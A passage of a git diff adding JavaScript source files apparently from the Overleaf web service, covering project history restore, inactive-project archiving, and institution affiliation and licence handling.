Date(updateAtVersion.meta.end_ts).toISOString(), + } + + for (const pathname of pathsAtPastVersion) { + await RestoreManager.revertFile(userId, projectId, version, pathname, { + origin, + }) + } + + const entitiesAtLiveVersion = + await ProjectEntityHandler.promises.getAllEntities(projectId) + + const trimLeadingSlash = path => path.replace(/^\//, '') + + const pathsAtLiveVersion = entitiesAtLiveVersion.docs + .map(doc => doc.path) + .concat(entitiesAtLiveVersion.files.map(file => file.path)) + .map(trimLeadingSlash) + + // Delete files that were not present at the reverted version + for (const path of pathsAtLiveVersion) { + if (!pathsAtPastVersion.includes(path)) { + await EditorController.promises.deleteEntityWithPath( + projectId, + path, + origin, + userId + ) + } + } + }, + + async _writeFileVersionToDisk(projectId, version, pathname) { + const url = `${ + Settings.apis.project_history.url + }/project/${projectId}/version/${version}/${encodeURIComponent(pathname)}` + return await FileWriter.promises.writeUrlToDisk(projectId, url) + }, + + async _getRangesFromHistory(projectId, version, pathname) { + const url = `${ + Settings.apis.project_history.url + }/project/${projectId}/ranges/version/${version}/${encodeURIComponent(pathname)}` + return await fetchJson(url) + }, + + async _getMetadataFromHistory(projectId, version, pathname) { + const url = `${ + Settings.apis.project_history.url + }/project/${projectId}/metadata/version/${version}/${encodeURIComponent(pathname)}` + return await fetchJson(url) + }, + + async _getUpdatesFromHistory(projectId, version) { + const url = `${Settings.apis.project_history.url}/project/${projectId}/updates?before=${version}&min_count=1` + const res = await fetchJson(url) + return res.updates + }, + + async _getProjectPathsAtVersion(projectId, version) { + const url = `${Settings.apis.project_history.url}/project/${projectId}/paths/version/${version}` + const res = await fetchJson(url) + return res.paths + }, +} + +module.exports = { ...callbackifyAll(RestoreManager), promises: RestoreManager } diff --git a/services/web/app/src/Features/History/project_key.js b/services/web/app/src/Features/History/project_key.js new file mode 100644 index 0000000..a4722db --- /dev/null +++ b/services/web/app/src/Features/History/project_key.js @@ -0,0 +1,24 @@ +// Keep in sync with services/history-v1/storage/lib/project_key.js +const _ = require('lodash') +const path = require('node:path') + +// +// The advice in http://docs.aws.amazon.com/AmazonS3/latest/dev/ +// request-rate-perf-considerations.html is to avoid sequential key prefixes, +// so we reverse the project ID part of the key as they suggest. +// +function format(projectId) { + const prefix = naiveReverse(pad(projectId)) + return path.join(prefix.slice(0, 3), prefix.slice(3, 6), prefix.slice(6)) +} + +function pad(number) { + return _.padStart(number, 9, '0') +} + +function naiveReverse(string) { + return string.split('').reverse().join('') +} + +exports.format = format +exports.pad = pad diff --git a/services/web/app/src/Features/InactiveData/InactiveProjectController.mjs b/services/web/app/src/Features/InactiveData/InactiveProjectController.mjs new file mode 100644 index 0000000..2e41e80 --- /dev/null +++ b/services/web/app/src/Features/InactiveData/InactiveProjectController.mjs @@ -0,0 +1,44 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import InactiveProjectManager from './InactiveProjectManager.js' + +export default { + deactivateOldProjects(req, res) { + const numberOfProjectsToArchive = parseInt( + req.body.numberOfProjectsToArchive, + 10 + ) + const { ageOfProjects } = req.body + return InactiveProjectManager.deactivateOldProjects( + numberOfProjectsToArchive, + ageOfProjects, + function (err, projectsDeactivated) { + if (err != null) { + return res.sendStatus(500) + } else { + return res.json(projectsDeactivated) + } + } + ) + }, + + deactivateProject(req, res) { + const { project_id: projectId } = req.params + return InactiveProjectManager.deactivateProject(projectId, function (err) { + if (err != null) { + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + }) + }, +} diff --git a/services/web/app/src/Features/InactiveData/InactiveProjectManager.js b/services/web/app/src/Features/InactiveData/InactiveProjectManager.js new file mode 100644 index 0000000..818fe70 --- /dev/null +++ b/services/web/app/src/Features/InactiveData/InactiveProjectManager.js @@ -0,0 +1,129 @@ +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const DocstoreManager = require('../Docstore/DocstoreManager') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const ProjectGetter = require('../Project/ProjectGetter') +const ProjectUpdateHandler = require('../Project/ProjectUpdateHandler') +const { Project } = require('../../models/Project') +const Modules = require('../../infrastructure/Modules') +const { READ_PREFERENCE_SECONDARY } = require('../../infrastructure/mongodb') +const { callbackifyAll } = require('@overleaf/promise-utils') +const Metrics = require('@overleaf/metrics') + +const MILISECONDS_IN_DAY = 86400000 +const InactiveProjectManager = { + async reactivateProjectIfRequired(projectId) { + let project + try { + project = await ProjectGetter.promises.getProject(projectId, { + active: true, + }) + } catch (err) { + OError.tag(err, 'error getting project', { + project_id: projectId, + }) + throw err + } + + logger.debug( + { projectId, active: project.active }, + 'seeing if need to reactivate project' + ) + + if (project.active) { + return + } + + try { + await DocstoreManager.promises.unarchiveProject(projectId) + } catch (err) { + OError.tag(err, 'error reactivating project in docstore', { + project_id: projectId, + }) + throw err + } + + await ProjectUpdateHandler.promises.markAsActive(projectId) + }, + + async deactivateOldProjects(limit, daysOld) { + if (limit == null) { + limit = 10 + } + if (daysOld == null) { + daysOld = 360 + } + const oldProjectDate = new Date() - MILISECONDS_IN_DAY * daysOld + + let projects + try { + // use $not $gt to catch non-opened projects where lastOpened is null + projects = await Project.find({ + lastOpened: { $not: { $gt: oldProjectDate } }, + }) + .where('active') + .equals(true) + .select('_id') + .limit(limit) + .read(READ_PREFERENCE_SECONDARY) + .exec() + } catch (err) { + logger.err({ err }, 'could not get projects for deactivating') + } + + logger.debug( + { numberOfProjects: projects && projects.length }, + 'deactivating projects' + ) + + for (const project of projects) { + try { + await InactiveProjectManager.deactivateProject(project._id) + } catch (err) { + logger.err( + { projectId: project._id, err }, + 'unable to deactivate project' + ) + } + } + + return projects + }, + + async deactivateProject(projectId) { + logger.debug({ projectId }, 'deactivating inactive project') + + // ensure project is removed from document updater (also flushes updates to history) + try { + await DocumentUpdaterHandler.promises.flushProjectToMongoAndDelete( + projectId + ) + } catch (err) { + logger.warn( + { err, projectId }, + 'error flushing project to mongo when archiving' + ) + Metrics.inc('inactive-project', 1, { + method: 'archive', + status: 'flush-error', + }) + throw err + } + + await Modules.promises.hooks.fire('deactivateProject', projectId) + + // now archive the project and mark it as inactive + try { + await DocstoreManager.promises.archiveProject(projectId) + await ProjectUpdateHandler.promises.markAsInactive(projectId) + } catch (err) { + logger.warn({ err, projectId }, 'error deactivating project') + throw err + } + }, +} + +module.exports = { + ...callbackifyAll(InactiveProjectManager), + promises: InactiveProjectManager, +} diff --git a/services/web/app/src/Features/Institutions/InstitutionsAPI.js b/services/web/app/src/Features/Institutions/InstitutionsAPI.js new file mode 100644 index 0000000..bdb575c --- /dev/null +++ b/services/web/app/src/Features/Institutions/InstitutionsAPI.js @@ -0,0 +1,389 @@ +const { callbackify } = require('util') +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const request = require('requestretry') +const { promisifyAll } = require('@overleaf/promise-utils') +const NotificationsBuilder = require('../Notifications/NotificationsBuilder') +const { + V1ConnectionError, + InvalidInstitutionalEmailError, +} = require('../Errors/Errors') +const { fetchJson, fetchNothing } = require('@overleaf/fetch-utils') + +function _makeRequestOptions(options) { + const requestOptions = { + method: options.method, + basicAuth: { user: settings.apis.v1.user, password: settings.apis.v1.pass }, + signal: AbortSignal.timeout(settings.apis.v1.timeout), + } + + if (options.body) { + requestOptions.json = options.body + } + + return requestOptions +} + +function _responseErrorHandling(options, error) { + const status = error.response.status + + if (status >= 500) { + throw new V1ConnectionError({ + message: 'error getting affiliations from v1', + info: { + status, + body: error.body, + }, + }) + } + + let errorBody + + try { + if (error.body) { + errorBody = JSON.parse(error.body) + } + } catch (e) {} + + let errorMessage + if (errorBody?.errors) { + errorMessage = `${status}: ${errorBody.errors}` + } else { + errorMessage = `${options.defaultErrorMessage}: ${status}` + } + + throw new OError(errorMessage, { status }) +} + +async function _affiliationRequestFetchJson(options) { + if (!settings.apis.v1.url) { + return + } // service is not configured + + const url = `${settings.apis.v1.url}${options.path}` + + const requestOptions = _makeRequestOptions(options) + + try { + return await fetchJson(url, requestOptions) + } catch (error) { + _responseErrorHandling(options, error) + } +} + +async function _affiliationRequestFetchNothing(options) { + if (!settings.apis.v1.url) { + return + } // service is not configured + + const url = `${settings.apis.v1.url}${options.path}` + + const requestOptions = _makeRequestOptions(options) + + try { + await fetchNothing(url, requestOptions) + } catch (error) { + _responseErrorHandling(options, error) + } +} + +async function _affiliationRequestFetchNothing404Ok(options) { + try { + await _affiliationRequestFetchNothing(options) + } catch (error) { + const status = error.info?.status + if (status !== 404) { + throw error + } + } +} + +function getInstitutionAffiliations(institutionId, callback) { + makeAffiliationRequest( + { + method: 'GET', + path: `/api/v2/institutions/${institutionId.toString()}/affiliations`, + defaultErrorMessage: "Couldn't get institution affiliations", + }, + (error, body) => callback(error, body || []) + ) +} + +function getConfirmedInstitutionAffiliations(institutionId, callback) { + makeAffiliationRequest( + { + method: 'GET', + path: `/api/v2/institutions/${institutionId.toString()}/confirmed_affiliations`, + defaultErrorMessage: "Couldn't get institution affiliations", + }, + (error, body) => callback(error, body || []) + ) +} + +function getInstitutionAffiliationsCounts(institutionId, callback) { + makeAffiliationRequest( + { + method: 'GET', + path: `/api/v2/institutions/${institutionId.toString()}/affiliations_counts`, + defaultErrorMessage: "Couldn't get institution counts", + }, + (error, body) => callback(error, body || []) + ) +} + +function getLicencesForAnalytics(lag, queryDate, callback) { + makeAffiliationRequest( + { + method: 'GET', + path: `/api/v2/institutions/institutions_licences`, + body: { query_date: queryDate, lag }, + defaultErrorMessage: 'Could not get institutions licences', + }, + callback + ) +} + +function getUserAffiliations(userId, callback) { + makeAffiliationRequest( + { + method: 'GET', + path: `/api/v2/users/${userId.toString()}/affiliations`, + defaultErrorMessage: "Couldn't get user affiliations", + }, + (error, body) => callback(error, body || []) + ) +} + +async function getUsersNeedingReconfirmationsLapsedProcessed() { + return await _affiliationRequestFetchJson({ + method: 'GET', + path: '/api/v2/institutions/need_reconfirmation_lapsed_processed', + defaultErrorMessage: + 'Could not get users that need reconfirmations lapsed processed', + }) +} + +async function addAffiliation(userId, email, affiliationOptions) { + const { + university, + department, + role, + confirmedAt, + entitlement, + rejectIfBlocklisted, + } = affiliationOptions + + try { + await _affiliationRequestFetchNothing({ + method: 'POST', + path: `/api/v2/users/${userId.toString()}/affiliations`, + body: { + email, + university, + department, + role, + confirmedAt, + entitlement, + rejectIfBlocklisted, + }, + defaultErrorMessage: "Couldn't create affiliation", + }) + } catch (error) { + if (error.info?.status === 422) { + throw new InvalidInstitutionalEmailError(error.message).withCause(error) + } + throw error + } + + if (!university) { + return + } + + // have notifications delete any ip matcher notifications for this university + try { + await NotificationsBuilder.promises + .ipMatcherAffiliation(userId) + .read(university.id) + } catch (err) { + // log and ignore error + logger.err({ err }, 'Something went wrong marking ip notifications read') + } +} + +async function removeAffiliation(userId, email) { + await _affiliationRequestFetchNothing404Ok({ + method: 'POST', + path: `/api/v2/users/${userId.toString()}/affiliations/remove`, + body: { email }, + defaultErrorMessage: "Couldn't remove affiliation", + }) +} + +function endorseAffiliation(userId, email, role, department, callback) { + makeAffiliationRequest( + { + method: 'POST', + path: `/api/v2/users/${userId.toString()}/affiliations/endorse`, + body: { email, role, department }, + defaultErrorMessage: "Couldn't endorse affiliation", + }, + callback + ) +} + +function deleteAffiliations(userId, callback) { + makeAffiliationRequest( + { + method: 'DELETE', + path: `/api/v2/users/${userId.toString()}/affiliations`, + defaultErrorMessage: "Couldn't delete affiliations", + }, + callback + ) +} + +function addEntitlement(userId, email, callback) { + makeAffiliationRequest( + { + method: 'POST', + path: `/api/v2/users/${userId}/affiliations/add_entitlement`, + body: { email }, + defaultErrorMessage: "Couldn't add entitlement", + }, + callback + ) +} + +function removeEntitlement(userId, email, callback) { + makeAffiliationRequest( + { + method: 'POST', + path: `/api/v2/users/${userId}/affiliations/remove_entitlement`, + body: { email }, + defaultErrorMessage: "Couldn't remove entitlement", + extraSuccessStatusCodes: [404], + }, + callback + ) +} + +function sendUsersWithReconfirmationsLapsedProcessed(users, callback) { + makeAffiliationRequest( + { + method: 'POST', + path: '/api/v2/institutions/reconfirmation_lapsed_processed', + body: { users }, + defaultErrorMessage: + 'Could not update reconfirmation_lapsed_processed_at', + }, + (error, body) => callback(error, body || []) + ) +} + +const InstitutionsAPI = { + getInstitutionAffiliations, + + getConfirmedInstitutionAffiliations, + + getInstitutionAffiliationsCounts, + + getLicencesForAnalytics, + + getUserAffiliations, + + getUsersNeedingReconfirmationsLapsedProcessed: callbackify( + getUsersNeedingReconfirmationsLapsedProcessed + ), + + addAffiliation: callbackify(addAffiliation), + + removeAffiliation: callbackify(removeAffiliation), + + endorseAffiliation, + + deleteAffiliations, + + addEntitlement, + + removeEntitlement, + + sendUsersWithReconfirmationsLapsedProcessed, +} + +function makeAffiliationRequest(options, callback) { + if (!settings.apis.v1.url) { + return callback(null) + } // service is not configured + if (!options.extraSuccessStatusCodes) { + options.extraSuccessStatusCodes = [] + } + const requestOptions = { + method: options.method, + url: `${settings.apis.v1.url}${options.path}`, + body: options.body, + auth: { user: settings.apis.v1.user, pass: settings.apis.v1.pass }, + json: true, + timeout: settings.apis.v1.timeout, + } + if (options.method === 'GET') { + requestOptions.maxAttempts = 3 + requestOptions.retryDelay = 500 + } else { + requestOptions.maxAttempts = 0 + } + request(requestOptions, function (error, response, body) { + if (error) { + return callback( + new V1ConnectionError('error getting affiliations from v1').withCause( + error + ) + ) + } + if (response && response.statusCode >= 500) { + return callback( + new V1ConnectionError({ + message: 'error getting affiliations from v1', + info: { + status: response.statusCode, + body, + }, + }) + ) + } + let isSuccess = response.statusCode >= 200 && response.statusCode < 300 + if (!isSuccess) { + isSuccess = options.extraSuccessStatusCodes.includes(response.statusCode) + } + if (!isSuccess) { + let errorMessage + if (body && body.errors) { + errorMessage = `${response.statusCode}: ${body.errors}` + } else { + errorMessage = `${options.defaultErrorMessage}: ${response.statusCode}` + } + + logger.warn({ path: options.path, body: options.body }, errorMessage) + return callback( + new OError(errorMessage, { statusCode: response.statusCode }) + ) + } + + callback(null, body) + }) +} + +InstitutionsAPI.promises = promisifyAll(InstitutionsAPI, { + without: [ + 'addAffiliation', + 'removeAffiliation', + 'getUsersNeedingReconfirmationsLapsedProcessed', + ], +}) + +InstitutionsAPI.promises.addAffiliation = addAffiliation +InstitutionsAPI.promises.removeAffiliation = removeAffiliation +InstitutionsAPI.promises.getUsersNeedingReconfirmationsLapsedProcessed = + getUsersNeedingReconfirmationsLapsedProcessed + +module.exports = InstitutionsAPI diff --git a/services/web/app/src/Features/Institutions/InstitutionsFeatures.js b/services/web/app/src/Features/Institutions/InstitutionsFeatures.js new file mode 100644 index 0000000..0b33fe1 --- /dev/null +++ b/services/web/app/src/Features/Institutions/InstitutionsFeatures.js @@ -0,0 +1,32 @@ +const { callbackifyAll } = require('@overleaf/promise-utils') +const UserGetter = require('../User/UserGetter') +const PlansLocator = require('../Subscription/PlansLocator') +const Settings = require('@overleaf/settings') + +async function getInstitutionsFeatures(userId) { + const planCode = await getInstitutionsPlan(userId) + const plan = planCode && PlansLocator.findLocalPlanInSettings(planCode) + const features = plan && plan.features + return features || {} +} + +async function getInstitutionsPlan(userId) { + if (await hasLicence(userId)) { + return Settings.institutionPlanCode + } + return null +} + +async function hasLicence(userId) { + const emailsData = await UserGetter.promises.getUserFullEmails(userId) + return emailsData.some(emailData => emailData.emailHasInstitutionLicence) +} +const InstitutionsFeatures = { + getInstitutionsFeatures, + getInstitutionsPlan, + hasLicence, +} +module.exports = { + promises: InstitutionsFeatures, + ...callbackifyAll(InstitutionsFeatures), +} diff --git a/services/web/app/src/Features/Institutions/InstitutionsGetter.js b/services/web/app/src/Features/Institutions/InstitutionsGetter.js new file mode 100644 index 0000000..7b6ef48 --- /dev/null +++ b/services/web/app/src/Features/Institutions/InstitutionsGetter.js @@ -0,0 +1,101 @@ +const { promisify, callbackify } = require('util') +const UserGetter = require('../User/UserGetter') +const UserMembershipsHandler = require('../UserMembership/UserMembershipsHandler') +const UserMembershipEntityConfigs = require('../UserMembership/UserMembershipEntityConfigs') + +async function getCurrentAffiliations(userId) { + const fullEmails = await UserGetter.promises.getUserFullEmails(userId) + // current are those confirmed and not with lapsed reconfirmations + return fullEmails + .filter( + emailData => + emailData.confirmedAt && + emailData.affiliation && + emailData.affiliation.institution && + emailData.affiliation.institution.confirmed && + !emailData.affiliation.pastReconfirmDate + ) + .map(emailData => emailData.affiliation) +} + +async function getCurrentAndPastAffiliationIds(userId) { + let fullEmails = await UserGetter.promises.getUserFullEmails(userId) + // current are those confirmed and not with lapsed reconfirmations + fullEmails = fullEmails + .filter( + emailData => + emailData.confirmedAt && emailData.affiliation?.institution?.confirmed + ) + .map(emailData => emailData.affiliation.institution.id) + // remove dupes + return [...new Set(fullEmails)] +} + +async function getCurrentInstitutionIds(userId) { + // current are those confirmed and not with lapsed reconfirmations + // only 1 record returned per current institutionId + const institutionIds = new Set() + const currentAffiliations = await getCurrentAffiliations(userId) + currentAffiliations.forEach(affiliation => { + institutionIds.add(affiliation.institution.id) + }) + return [...institutionIds] +} + +async function getCurrentInstitutionsWithLicence(userId) { + // current are those confirmed and not with lapsed reconfirmations + // only 1 record returned per current institution + const institutions = {} + const currentAffiliations = await getCurrentAffiliations(userId) + currentAffiliations.forEach(affiliation => { + if (affiliation.licence && affiliation.licence !== 'free') { + institutions[affiliation.institution.id] = affiliation.institution + } + }) + return Object.values(institutions) +} + +const InstitutionsGetter = { + getConfirmedAffiliations(userId, callback) { + UserGetter.getUserFullEmails(userId, function (error, emailsData) { + if (error) { + return callback(error) + } + + const confirmedAffiliations = emailsData + .filter( + emailData => + emailData.confirmedAt && + emailData.affiliation && + emailData.affiliation.institution && + emailData.affiliation.institution.confirmed + ) + .map(emailData => emailData.affiliation) + + callback(null, confirmedAffiliations) + }) + }, + + getCurrentInstitutionIds: callbackify(getCurrentInstitutionIds), + getCurrentInstitutionsWithLicence: callbackify( + getCurrentInstitutionsWithLicence + ), + + getManagedInstitutions(userId, callback) { + UserMembershipsHandler.getEntitiesByUser( + UserMembershipEntityConfigs.institution, + userId, + callback + ) + }, +} + +InstitutionsGetter.promises = { + getCurrentAffiliations, + getCurrentInstitutionIds, + getCurrentInstitutionsWithLicence, + getCurrentAndPastAffiliationIds, + getManagedInstitutions: promisify(InstitutionsGetter.getManagedInstitutions), +} + +module.exports = InstitutionsGetter diff --git a/services/web/app/src/Features/Institutions/InstitutionsHelper.js b/services/web/app/src/Features/Institutions/InstitutionsHelper.js new file mode 100644 index 0000000..c4cb486 --- /dev/null +++ b/services/web/app/src/Features/Institutions/InstitutionsHelper.js @@ -0,0 +1,28 @@ +function emailHasLicence(emailData) { + if (!emailData.confirmedAt) { + return false + } + if (!emailData.affiliation) { + return false + } + const affiliation = emailData.affiliation + const institution = affiliation.institution + if (!institution) { + return false + } + if (!institution.confirmed) { + return false + } + if (!affiliation.licence) { + return false + } + if (affiliation.pastReconfirmDate) { + return false + } + + return affiliation.licence !== 'free' +} + +module.exports = { + emailHasLicence, +} diff --git a/services/web/app/src/Features/Institutions/InstitutionsManager.js b/services/web/app/src/Features/Institutions/InstitutionsManager.js new file mode 100644 index 0000000..6acf078 --- /dev/null +++ b/services/web/app/src/Features/Institutions/InstitutionsManager.js @@ -0,0 +1,361 @@ +const { + callbackifyAll, + promiseMapWithLimit, +} = require('@overleaf/promise-utils') +const { ObjectId } = require('mongodb-legacy') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const { fetchJson } = require('@overleaf/fetch-utils') +const InstitutionsAPI = require('./InstitutionsAPI') +const FeaturesUpdater = require('../Subscription/FeaturesUpdater') +const FeaturesHelper = require('../Subscription/FeaturesHelper') +const UserGetter = require('../User/UserGetter') +const NotificationsBuilder = require('../Notifications/NotificationsBuilder') +const NotificationsHandler = require('../Notifications/NotificationsHandler') +const SubscriptionLocator = require('../Subscription/SubscriptionLocator') +const { Institution } = require('../../models/Institution') +const { Subscription } = require('../../models/Subscription') +const OError = require('@overleaf/o-error') + +const ASYNC_LIMIT = parseInt(process.env.ASYNC_LIMIT, 10) || 5 + +async function _getSsoUsers(institutionId, lapsedUserIds) { + let currentNotEntitledCount = 0 + const ssoNonEntitledUsersIds = [] + const allSsoUsersByIds = {} + + const allSsoUsers = await UserGetter.promises.getSsoUsersAtInstitution( + institutionId, + { samlIdentifiers: 1 } + ) + allSsoUsers.forEach(user => { + allSsoUsersByIds[user._id] = user.samlIdentifiers.find( + identifer => identifer.providerId === institutionId.toString() + ) + }) + for (const userId in allSsoUsersByIds) { + if (!allSsoUsersByIds[userId].hasEntitlement) { + ssoNonEntitledUsersIds.push(userId) + } + } + if (ssoNonEntitledUsersIds.length > 0) { + currentNotEntitledCount = ssoNonEntitledUsersIds.filter( + id => !lapsedUserIds.includes(id) + ).length + } + + return { + allSsoUsers, + allSsoUsersByIds, + currentNotEntitledCount, + } +} + +async function _checkUsersFeatures(userIds) { + const users = await UserGetter.promises.getUsers(userIds, { features: 1 }) + const result = { + proUserIds: [], + nonProUserIds: [], + } + + users.forEach(user => { + const hasProFeaturesOrBetter = FeaturesHelper.isFeatureSetBetter( + user.features, + Settings.features.professional + ) + + if (hasProFeaturesOrBetter) { + result.proUserIds.push(user._id) + } else { + result.nonProUserIds.push(user._id) + } + }) + + return result +} + +const InstitutionsManager = { + async clearInstitutionNotifications(institutionId, dryRun) { + async function clear(key) { + const run = dryRun + ? NotificationsHandler.promises.previewMarkAsReadByKeyOnlyBulk + : NotificationsHandler.promises.markAsReadByKeyOnlyBulk + + return await run(key) + } + + const ipMatcherAffiliation = await clear( + `ip-matched-affiliation-${institutionId}` + ) + const featuresUpgradedByAffiliation = await clear( + `features-updated-by=${institutionId}` + ) + const redundantPersonalSubscription = await clear( + `redundant-personal-subscription-${institutionId}` + ) + + return { + ipMatcherAffiliation, + featuresUpgradedByAffiliation, + redundantPersonalSubscription, + } + }, + + async refreshInstitutionUsers(institutionId, notify) { + const refreshFunction = notify ? refreshFeaturesAndNotify : refreshFeatures + + const { institution, affiliations } = + await fetchInstitutionAndAffiliations(institutionId) + + for (const affiliation of affiliations) { + affiliation.institutionName = institution.name + affiliation.institutionId = institutionId + } + + await promiseMapWithLimit(ASYNC_LIMIT, affiliations, refreshFunction) + }, + + async checkInstitutionUsers(institutionId, emitNonProUserIds) { + /* + v1 has affiliation data. Via getInstitutionAffiliationsCounts, v1 will send + lapsed_user_ids, which includes all user types + (not linked, linked and entitled, linked not entitled). + However, for SSO institutions, it does not know which email is linked + to SSO when the license is non-trivial. Here we need to split that + lapsed count into SSO (entitled and not) or just email users + */ + + const result = { + emailUsers: { + total: 0, // v1 all users - v2 all SSO users + current: 0, // v1 current - v1 SSO entitled - (v2 calculated not entitled current) + lapsed: 0, // v1 lapsed user IDs that are not in v2 SSO users + pro: { + current: 0, + lapsed: 0, + }, + nonPro: { + current: 0, + lapsed: 0, + }, + }, + ssoUsers: { + total: 0, // only v2 + current: { + entitled: 0, // only v1 + notEntitled: 0, // v2 non-entitled SSO users - v1 lapsed user IDs + }, + lapsed: 0, // v2 SSO users that are in v1 lapsed user IDs + pro: { + current: 0, + lapsed: 0, + }, + nonPro: { + current: 0, + lapsed: 0, + }, + }, + } + + const { + user_ids: userIds, // confirmed and not removed users. Includes users with lapsed reconfirmations + current_users_count: currentUsersCount, // all users not with lapsed reconfirmations + lapsed_user_ids: lapsedUserIds, // includes all user types that did not reconfirm (sso entitled, sso not entitled, email only) + with_confirmed_email: withConfirmedEmail, // same count as affiliation metrics + entitled_via_sso: entitled, // same count as affiliation metrics + } = await InstitutionsAPI.promises.getInstitutionAffiliationsCounts( + institutionId + ) + result.ssoUsers.current.entitled = entitled + + const { allSsoUsers, allSsoUsersByIds, currentNotEntitledCount } = + await _getSsoUsers(institutionId, lapsedUserIds) + result.ssoUsers.total = allSsoUsers.length + result.ssoUsers.current.notEntitled = currentNotEntitledCount + + // check if lapsed user ID an SSO user + const lapsedUsersByIds = {} + lapsedUserIds.forEach(id => { + lapsedUsersByIds[id] = true // create a map for more performant lookups + if (allSsoUsersByIds[id]) { + ++result.ssoUsers.lapsed + } else { + ++result.emailUsers.lapsed + } + }) + + result.emailUsers.current = + currentUsersCount - entitled - result.ssoUsers.current.notEntitled + result.emailUsers.total = userIds.length - allSsoUsers.length + + // compare v1 and v2 counts. + if ( + result.ssoUsers.current.notEntitled + result.emailUsers.current !== + withConfirmedEmail + ) { + result.databaseMismatch = { + withConfirmedEmail: { + v1: withConfirmedEmail, + v2: result.ssoUsers.current.notEntitled + result.emailUsers.current, + }, + } + } + + // Add Pro/NonPro status for users + // NOTE: Users not entitled via institution could have Pro via another method + const { proUserIds, nonProUserIds } = await _checkUsersFeatures(userIds) + proUserIds.forEach(id => { + const userType = lapsedUsersByIds[id] ? 'lapsed' : 'current' + if (allSsoUsersByIds[id]) { + result.ssoUsers.pro[userType]++ + } else { + result.emailUsers.pro[userType]++ + } + }) + nonProUserIds.forEach(id => { + const userType = lapsedUsersByIds[id] ? 'lapsed' : 'current' + if (allSsoUsersByIds[id]) { + result.ssoUsers.nonPro[userType]++ + } else { + result.emailUsers.nonPro[userType]++ + } + }) + if (emitNonProUserIds) { + result.nonProUserIds = nonProUserIds + } + return result + }, + + async getInstitutionUsersSubscriptions(institutionId) { + const affiliations = + await InstitutionsAPI.promises.getInstitutionAffiliations(institutionId) + + const userIds = affiliations.map( + affiliation => new ObjectId(affiliation.user_id) + ) + return await Subscription.find({ admin_id: userIds }) + .populate('admin_id', 'email') + .exec() + }, + + async affiliateUsers(hostname) { + const reversedHostname = hostname.trim().split('').reverse().join('') + + let users + try { + users = await UserGetter.promises.getInstitutionUsersByHostname(hostname) + } catch (error) { + OError.tag(error, 'problem fetching users by hostname') + throw error + } + + await promiseMapWithLimit(ASYNC_LIMIT, users, user => + affiliateUserByReversedHostname(user, reversedHostname) + ) + }, + + async fetchV1Data(institution) { + const url = `${Settings.apis.v1.url}/universities/list/${institution.v1Id}` + try { + const data = await fetchJson(url, { + signal: AbortSignal.timeout(Settings.apis.v1.timeout), + }) + + institution.name = data?.name + institution.countryCode = data?.country_code + institution.departments = data?.departments + institution.portalSlug = data?.portal_slug + institution.enterpriseCommons = data?.enterprise_commons + } catch (error) { + logger.err( + { model: 'Institution', v1Id: institution.v1Id, error }, + '[fetchV1DataError]' + ) + } + }, +} + +const fetchInstitutionAndAffiliations = async institutionId => { + let institution = await Institution.findOne({ v1Id: institutionId }).exec() + institution = await institution.fetchV1DataPromise() + + const affiliations = + await InstitutionsAPI.promises.getConfirmedInstitutionAffiliations( + institutionId + ) + + return { institution, affiliations } +} + +async function refreshFeatures(affiliation) { + const userId = new ObjectId(affiliation.user_id) + return await FeaturesUpdater.promises.refreshFeatures( + userId, + 'refresh-institution-users' + ) +} + +async function refreshFeaturesAndNotify(affiliation) { + const userId = new ObjectId(affiliation.user_id) + const { featuresChanged } = await FeaturesUpdater.promises.refreshFeatures( + userId, + 'refresh-institution-users' + ) + const { user, subscription } = await getUserInfo(userId) + return await notifyUser(user, affiliation, subscription, featuresChanged) +} + +const getUserInfo = async userId => { + const user = await UserGetter.promises.getUser(userId, { _id: 1 }) + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(user) + return { user, subscription } +} + +const notifyUser = async (user, affiliation, subscription, featuresChanged) => { + return await Promise.all([ + (async () => { + if (featuresChanged) { + return await NotificationsBuilder.promises + .featuresUpgradedByAffiliation(affiliation, user) + .create() + } + })(), + (async () => { + if (subscription && !subscription.groupPlan) { + return await NotificationsBuilder.promises + .redundantPersonalSubscription(affiliation, user) + .create() + } + })(), + ]) +} + +async function affiliateUserByReversedHostname(user, reversedHostname) { + const matchingEmails = user.emails.filter( + email => email.reversedHostname === reversedHostname + ) + + for (const email of matchingEmails) { + try { + await InstitutionsAPI.promises.addAffiliation(user._id, email.email, { + confirmedAt: email.confirmedAt, + entitlement: + email.samlIdentifier && email.samlIdentifier.hasEntitlement, + }) + } catch (error) { + OError.tag(error, 'problem adding affiliation while confirming hostname') + throw error + } + } + + await FeaturesUpdater.promises.refreshFeatures( + user._id, + 'affiliate-user-by-reversed-hostname' + ) +} + +module.exports = { + ...callbackifyAll(InstitutionsManager), + promises: InstitutionsManager, +} diff --git a/services/web/app/src/Features/LinkedFiles/LinkedFilesController.mjs b/services/web/app/src/Features/LinkedFiles/LinkedFilesController.mjs new file mode 100644 index 0000000..b6ddf81 --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/LinkedFilesController.mjs @@ -0,0 +1,271 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import SessionManager from '../Authentication/SessionManager.js' +import Settings from '@overleaf/settings' +import _ from 'lodash' +import AnalyticsManager from '../../../../app/src/Features/Analytics/AnalyticsManager.js' +import LinkedFilesHandler from './LinkedFilesHandler.js' +import { + CompileFailedError, + UrlFetchFailedError, + InvalidUrlError, + AccessDeniedError, + BadEntityTypeError, + BadDataError, + ProjectNotFoundError, + V1ProjectNotFoundError, + SourceFileNotFoundError, + NotOriginalImporterError, + FeatureNotAvailableError, + RemoteServiceError, + FileCannotRefreshError, +} from './LinkedFilesErrors.js' +import { + OutputFileFetchFailedError, + 